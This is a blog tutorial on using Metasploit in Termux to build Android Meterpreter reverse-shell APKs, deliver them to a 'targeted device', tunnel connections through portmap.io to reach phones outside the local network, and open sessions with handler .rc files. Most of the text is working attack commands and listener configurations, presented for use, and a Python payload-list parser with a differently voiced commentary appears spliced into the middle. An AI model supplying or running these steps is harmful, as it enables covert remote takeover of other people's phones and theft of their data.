Best way to generate Metasploit payloads in Termux Inside and outside LAN | Termux Tutorial

March 24, 2021
Welcome back again to EFX Tv. This blog will be among the most useful ones for you, as I'm going to share the

Best Way to Generate Metasploit Payloads in Termux

If you have been reading my blogs regularly and subscribed to my YouTube channel, you will know that I don't share things frequently; however, you will learn some hidden tips and tricks for Linux, Termux, Kali Linux, Ubuntu, Android, Windows, etc.
In today's blog, you will get a detailed way to generate and use Metasploit payloads in Termux. Very soon I'll share how to do the same thing using Kali Linux and Ubuntu.
The related questions I'll be answering are listed below:
0 What are Termux, Termux Black and Metasploit?
1 How to install Termux and Termux Black?
2 How to install Metasploit and related requirements in Termux?
3 How to search for available payloads and generate them one by one?
4 How to exploit targeted devices outside the network using portmap.io?
5 List of available payloads for Android, Windows, and Linux?
6 Generate and exploit inside the network and outside the network?
7 From where can an automated .rc file be generated to quickly start the Metasploit listener in Termux?
8 Bonus payloads and listeners list?


0 What are Termux, Termux Black, and Metasploit?
Termux is an Android application that works as a Linux terminal on Android phones. Termux lets you perform almost all Linux (CLI/GUI-based) tasks on an Android phone. The limitations apply to non-rooted Android devices (no root access).

Termux Black is an unofficial repository for Termux that gives easy access to some of the most useful repositories, which were available for root users only, along with some extra navigation keys.

Metasploit is an open-source project that contains many payloads and exploits for vulnerabilities in hardware, software, web applications, etc. It is the tool penetration testers use most to gather information about a particular IP (a device on the internet). Nmap, Netcat, tcpdump, HTTrack, vnstat, iftop, nload, Burp Suite, Wireshark, wget and curl can also be useful.

1 How to install Termux and Termux Black?
To install Termux you need to download two apps on your Android device: 1 Termux and 2 Termux API. Go to the Play Store and download them both. After that, grant them storage permission so that they can create files on your device.

As I already explained, Termux Black is an unofficial repository for Termux. To download the Termux Black script you need to visit its official git repository and clone it, so git must be installed in Termux first. Install git, then run the commands below in the terminal and restart the Termux app.
 $ apt install git wget curl 
 $ apt update  
 $ apt upgrade 
 $ apt dist-upgrade 
 $ cd $HOME 
 $ wget https://github.com/Hax4us/TermuxBlack/raw/master/install.sh 
 $ bash install.sh 


2 How to install Metasploit and related requirements in Termux?
Again, Metasploit for Termux is a Termux Black script that works fine. If you download the script from somewhere else you may get errors. Run the commands below to download and install the Metasploit script in Termux.
 $ cd $HOME 
 $ wget https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh 
 $ chmod +x metasploit.sh 
 $ ./metasploit.sh 

3 How to search for available payloads and generate them one by one?
To list all the available payloads, or keep a copy of the list, run the command below. It generates a file payload.txt containing all the payloads available as of now.
 $ msfvenom -l payloads >payload.txt 
To find the payloads for a specific platform you can run grep, as shown in the image below. Similarly, you can search for payloads belonging to PHP, Java, reverse TCP, Linux, etc.
 $ cat payload.txt |grep android 


Another example, for reverse TCP payloads:
 $ cat payload.txt |grep reverse_tcp 


To get more details about a payload, run the command:
 $ msfvenom -p PAYLOAD-NAME --list-options 
For example, I'm going to show you the details of android/meterpreter/reverse_tcp. Please look at the image below.
 $ msfvenom -p android/meterpreter/reverse_tcp --list-options 


There are some more options for listing payloads by platform, format, architecture, encryption, module and exploit. All the commands are listed below.
 $ msfvenom --list platforms	  
 $ msfvenom --list formats	  
 $ msfvenom --list archs	  
 $ msfvenom --list encrypt 

How to search for exploits and payloads within Metasploit

The commands listed below (run inside msfconsole) will help you search for payloads, exploits and encoders by device, service, version, make and model, or module. Try these commands on your terminal and practice as much as you can.
 $ search exploit android 
 $ search exploit windows 
 $ search exploit dlink 
 $ search exploit servicename

How to do an advanced search and get information about an exploit in Metasploit

Step 1 The commands listed below will help you get deeper details about a specific module. All the commands are explained below.
First run msfconsole and search for an exploit using the command:
 $ search exploit windows

Step 2 Use the module; for example I'm going to use exploit/multi/local/allwinner_backdoor
 $ use exploit/multi/local/allwinner_backdoor

Step 3 To get information on the selected payload or exploit, simply type the commands below in msfconsole. show options lists the settings you have entered for the target, port and the other options of the module (and of the payload it uses by default), so you can verify them. info prints a bunch of information about the exploit (payload name, module, arch, rank, basic options, payload information, description and references). advanced prints the advanced options of the selected exploit, with the current setting, whether each is required, and a description.
 $ show options 
 $ info 
 $ advanced 

How to create an RC file in Metasploit

First of all, an RC file (a text file with the extension .rc) lets you execute commands automatically after starting msfconsole. An RC file contains the list of commands you have used after starting Metasploit and want to reuse, for example after getting a session. There is a special feature in Metasploit nobody talks about: you can create an RC file from within msfconsole while using it in the terminal. Suppose you have used lots of modules and don't remember them; you can simply save all the called modules in an RC file ending with the extension .rc. For that, run the command below. You can change file.rc to any name, but the extension should stay the same. For more details, use the help command right after starting msfconsole.
 $ makerc file.rc


4 Generate and exploit a payload for targeted devices inside and outside the network?

Inside the LAN (local area network)

First, you need to get your device's local IP using the command below. The IP address usually starts with 192; it depends on your router configuration. Click the image: the highlighted section contains the IP of my Termux.
 $ ifconfig|grep inet 


For Android, you can generate the payload using the command below. Simply copy and paste it into the terminal. I'm going to use LHOST (the local IP found above, 192.168.0.2 in my case) and LPORT=4445. Once you paste the command and hit Enter, it will generate payload.apk for you.
 $ msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.2 lport=4445 R > payload.apk  


Share the APK file with the targeted device connected to your network/Wi-Fi. Run the command below in the terminal (from the directory containing payload.apk); it starts a Python web server that is visible to all devices connected to your Wi-Fi at http://192.168.0.2:8000. Open that address on the device, click on the APK file and install it. For this demonstration, I'm going to install the APK on my Android device.
 $ python -m http.server 8000 


Click on INSTALL ANYWAY

Click on DON'T SEND

Now you can open the app and click on CONTINUE. Make sure the device is connected to the local area network via Wi-Fi. The app has been installed and is running on my device. Now, let us start the listener.

The listener for the Android reverse TCP payload is written below.

Copy everything inside the box. Open Termux and go to the same directory where the APK was generated. Create a file named File.rc using the command below.
 $ nano File.rc 


Paste everything you copied from the box above, then press Ctrl+O (hit Enter) and Ctrl+X (hit Enter). Now we will run the listener: to start the Metasploit listener for the payload android/meterpreter/reverse_tcp, run the command below. Note: the RC file must be in the same directory.
 $ msfconsole -q -r 'File.rc' 


Once you run the command, you will see something like the image below. It means we are getting sessions from the device on which our app is installed.

To check the number of sessions, run the command below. You can see that sessions 1, 4 and 5 are active.
 $ sessions  


To interact with one of the active sessions, run the command below. In the image you can see that we have got a Meterpreter session. From here, we can do lots of things.
 $ sessions 1 


To see the list of commands you can run in the Meterpreter session, type the command help:
 $ help 
For example, I've run the command sysinfo; the output is shown in the image below.

In the same way you can run more commands to get the desired thing done on the device your app is installed on. The help command and the question mark "?" will show you all the related commands and help. For more payload commands visit the link.

Outside the LAN (local area network)


To do the same thing outside the LAN, follow these steps:
Step 1
Sign up to portmap.io and set up port forwarding. Please watch the video to sign up and set up portmap.io on an Android device.

Step 2
Download the Android app known as OpenVPN: go to the Play Store, search for OpenVPN and install the application.
Click on the plus button
Tap on FILE
Locate the downloaded .ovpn file, click on it, and hit IMPORT
Now tick Connect after import
Press the ADD button at the top right
When you see the green mark next to your OpenVPN profile, the connection is active.

Step 3
Generate the payload using the command below.
LHOST and LPORT come from your portmap.io account. Change LHOST and LPORT to your details and paste the command into Termux (hit Enter). Then go back up, copy the RC file details and change LPORT and LHOST there as well.
 $ msfvenom -p android/meterpreter/reverse_tcp lhost=portmapsystem-30901.portmap.host lport=30901 R > payload.apk  


RC file for outside the LAN

Step 4
Now exploit with the app. To verify whether we are getting connections from outside the network, simply run your device on mobile data. Install the app on any device connected to the internet. Before running the listener, make sure you have followed Step 3 correctly. Step 3 creates a tunnel with the same configuration your Android app has and provides the reverse TCP connection through which you can do so many things.

To start the listener, run the command:
 $ msfconsole -q -r File.rc 
Now check for the active sessions as we did above. This command lists all the active sessions:
 $ sessions 


Now connect to the session to get access to the device. Session numbers can differ on your Android device; make sure you use an active session number to get the reverse connection.
 $ sessions 1

5 List of available payloads for Android, Windows, and Linux?
 $ msfvenom -l payloads >payload.txt 
 $ cat payload.txt|grep android 
 $ cat payload.txt|grep windows 
 $ cat payload.txt|grep linux 
 $ cat payload.txt |grep linux|awk '{print $1}'|sed 's#^#$ #g' 
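The grep one-liners above, and those in section 3, pull rows out of payload.txt by keyword. As an added example (not code from the original post), here is a small Python script that parses the payload.txt produced by msfvenom -l payloads and classifies every row by platform, architecture, staged versus stageless form and transport. It relies on the naming convention that a staged payload is written stage/stager (android/meterpreter/reverse_tcp) while the stageless form joins the two with an underscore (android/meterpreter_reverse_tcp). The sample listing embedded in the script is constructed for the example and its descriptions are paraphrased; the STAGES and KNOWN_ARCHS tables are my own assumption about the common segment names, not something the page or Metasploit publishes.

```python
"""Parse and classify the output of `msfvenom -l payloads` (payload.txt)."""
import re
from collections import defaultdict

# Constructed sample in the layout msfvenom prints for `-l payloads`; the
# descriptions are shortened/paraphrased here, not captured from a real run.
SAMPLE_PAYLOAD_TXT = """\
Framework Payloads (8 total) [--payload <value>]
================================================

    Name                                   Description
    ----                                   -----------
    android/meterpreter/reverse_tcp        Run a Meterpreter server in Android (staged)
    android/meterpreter_reverse_tcp        Connect back and spawn Meterpreter (stageless)
    android/shell/reverse_http             Spawn a command shell, tunnelled over HTTP
    cmd/unix/reverse_bash                  Interactive shell via bash's /dev/tcp
    linux/x64/meterpreter/reverse_tcp      Inject the mettle server payload (staged)
    linux/x86/shell_bind_tcp               Listen for a connection and spawn a shell
    php/meterpreter/reverse_tcp            Run a Meterpreter server in PHP
    windows/x64/meterpreter/reverse_https  Inject the Meterpreter DLL, HTTPS stager
"""

# One payload row: four-space indent, name, whitespace, optional description.
PAYLOAD_LINE = re.compile(r"^ {4}(?P<name>\S+)(?:\s+(?P<desc>.*))?$")
# Assumed stage names: they appear as their own segment in staged payloads
# (meterpreter/reverse_tcp) or as a prefix in stageless ones (meterpreter_reverse_tcp).
STAGES = ("meterpreter", "vncinject", "dllinject", "powershell", "upexec", "shell")
# Assumed architecture segments that may sit between platform and stage.
KNOWN_ARCHS = {"x86", "x64", "x86_64", "aarch64", "armle", "armbe",
               "mipsle", "mipsbe", "mips64", "ppc", "ppc64", "sparc"}
TRANSPORT = re.compile(r"(?P<direction>reverse|bind)_(?P<proto>[a-z0-9_]+)$")


def classify(name, desc=""):
    """Split a payload name into platform, arch, staged/stageless, stage and transport."""
    parts = name.split("/")
    platform = parts[0]
    arch = next((p for p in parts[1:-1] if p in KNOWN_ARCHS), None)
    last = parts[-1]
    if len(parts) >= 3 and parts[-2] in STAGES:
        # stage/stager form: the handler sends the stage after the stager connects
        kind, stage, connector = "staged", parts[-2], last
    else:
        # single blob: either stage_stager joined by "_" or a one-shot command payload
        kind, stage, connector = "stageless", "single", last
        for s in STAGES:
            if last.startswith(s + "_"):
                stage, connector = s, last[len(s) + 1:]
                break
    t = TRANSPORT.search(connector)
    return {
        "name": name,
        "platform": platform,
        "arch": arch,
        "kind": kind,
        "stage": stage,
        "direction": t.group("direction") if t else None,
        "transport": t.group("proto") if t else None,
        "description": desc,
    }


def parse_payload_list(text):
    """Return one classified dict per payload row, skipping headers and rules."""
    payloads = []
    for line in text.splitlines():
        m = PAYLOAD_LINE.match(line)
        if not m or m.group("name") in ("Name", "----"):
            continue
        payloads.append(classify(m.group("name"), (m.group("desc") or "").strip()))
    return payloads


def filter_payloads(payloads, **criteria):
    """Keep payloads whose fields equal every given criterion, e.g. platform="android"."""
    return [p for p in payloads if all(p.get(k) == v for k, v in criteria.items())]


def summarize(payloads):
    """Count payloads per (platform, staged|stageless) pair."""
    counts = defaultdict(int)
    for p in payloads:
        counts[(p["platform"], p["kind"])] += 1
    return dict(counts)


if __name__ == "__main__":
    rows = parse_payload_list(SAMPLE_PAYLOAD_TXT)
    for (platform, kind), n in sorted(summarize(rows).items()):
        print(f"{platform:10} {kind:10} {n}")
    for p in filter_payloads(rows, platform="android", direction="reverse"):
        print(p["name"], "->", p["kind"], p["stage"], p["transport"])
```

Run it against a real payload.txt by replacing SAMPLE_PAYLOAD_TXT with the file's contents. The staged/stageless distinction is the part worth understanding: the bonus list in section 8 contains both forms, the handler's set PAYLOAD must name exactly the same form as the generated APK, and an analyst reading an .rc file or a network capture can tell from the name alone whether a second stage is transmitted over the connection after the initial connect-back.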


6 Generate and exploit inside the network and outside the network?
Step 1
Sign up to portmap.io

Step 2
Configure the downloaded file with the Android OpenVPN app

Step 3
Generate and share the exploit app

Step 4
Start the listener with the .rc file
 $ msfconsole -q -r File.rc 


Step 5
List all the active sessions
 $ sessions 


Step 6
Connect to the session
 $ sessions 1 


Step 7
Type help to get the related commands and see the advanced access options.

7 From where can an automated .rc file be generated to quickly start the Metasploit listener in Termux?
You can search on Google; you will find almost all the RC files online. Just change the PAYLOAD name and the rest will remain the same. I'll create an app for that very soon.

use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST hpproject2020-63544.portmap.host
set LPORT 3333
set ExitOnSession false
set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j
8 Bonus payloads and Listeners list?
PAYLOAD android/meterpreter/reverse_http
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_http
set LHOST ChangeIP
set LPORT 3333
set ExitOnSession false
set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

PAYLOAD android/meterpreter/reverse_https
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_https
set LHOST ChangeIP
set LPORT 3333
set ExitOnSession false
set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

PAYLOAD android/meterpreter/reverse_tcp
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST ChangeIP
set LPORT 3333
set ExitOnSession false
set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

PAYLOAD android/meterpreter_reverse_http
use exploit/multi/handler
set PAYLOAD android/meterpreter_reverse_http
set LHOST ChangeIP
set LPORT 3333
set ExitOnSession false
set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

PAYLOAD android/meterpreter_reverse_https
use exploit/multi/handler
set PAYLOAD android/meterpreter_reverse_https
set LHOST ChangeIP
set LPORT 3333
set ExitOnSession false
set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

PAYLOAD android/meterpreter_reverse_tcp
use exploit/multi/handler
set PAYLOAD android/meterpreter_reverse_tcp
set LHOST ChangeIP
set LPORT 3333
set ExitOnSession false
set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

PAYLOAD android/shell/reverse_http
use exploit/multi/handler
set PAYLOAD android/shell/reverse_http
set LHOST ChangeIP
set LPORT 3333
set ExitOnSession false
set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

PAYLOAD android/shell/reverse_https
use exploit/multi/handler
set PAYLOAD android/shell/reverse_https
set LHOST ChangeIP
set LPORT 3333
set ExitOnSession false
set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

PAYLOAD android/shell/reverse_tcp
use exploit/multi/handler
set PAYLOAD android/shell/reverse_tcp
set LHOST ChangeIP
set LPORT 3333
set ExitOnSession false
set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

More listeners will be added in upcoming days. Please like and subscribe our youtube channel for more tutorials like this.
